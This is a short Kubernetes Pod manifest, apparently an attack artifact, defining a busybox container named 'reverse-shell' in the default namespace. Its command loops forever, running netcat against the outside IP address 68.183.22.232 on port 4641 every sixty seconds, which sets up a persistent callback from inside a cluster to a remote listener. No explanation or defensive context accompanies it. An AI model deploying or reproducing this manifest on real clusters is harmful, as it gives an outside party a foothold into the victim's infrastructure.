apiVersion: v1
kind: Pod
metadata:
  namespace: default
  name: test
spec:
  restartPolicy: Never
  containers:
  - name: reverse-shell
    image: busybox
    command: ["sh", "-c"]
    args:
      - "while true; do nc 68.183.22.232 4641; sleep 60; done"
